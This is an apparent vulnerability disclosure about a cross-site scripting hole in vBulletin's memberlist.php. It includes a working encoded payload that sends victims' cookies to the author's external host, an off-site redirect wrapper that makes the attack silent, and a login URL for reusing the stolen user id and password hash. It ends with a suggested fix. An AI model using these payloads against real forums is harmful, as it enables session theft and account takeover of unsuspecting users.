memberlist.php of vBulletin

[<plato () swgmotu com>]

vBulletin ALL versions
Vendor status: notified 3/18/2;  no response
 
Within the first few lines of code in memberlist.php, the variable
$letterbits is evaled.  Because of the way PHP initializes variables, we can
inject HTML, or JavaScript into the document.  So by directing a user to,
for example:
http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocatio
n%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%
2Bescape%28document%2Ecookie%29%3C%2Fscript%3E(vbulletin.com has apparently
patched their installation somehow), I can steal the users password hash and
user id.  Because of the way vB parses urls, the above will not function
inside the forum, but if we put this in an off-site html file:
<script>
location =
"http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocati
on%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27
%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>
and then link to it instead, the exploit will work as intended...the user
doesn't even have to be aware of what has transpired...the above link will
proceed first to the memberlist w/cookie stealing code, and then to my
<shameless plug>Star Wars Galaxies Player Association's homepage.
http://www.swgmotu.com <http://www.swgmotu.com/>  </shameless plug>
 
With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?bbuserid=[user
id]&bbpassword=[password hash]
 
I have tried this successfully on five other users besides myself(all with
consent).
 
I believe the simplest fix would be to initialized letterbits($letterbits =
"";) at the top of memberlist.php.
 
~Plato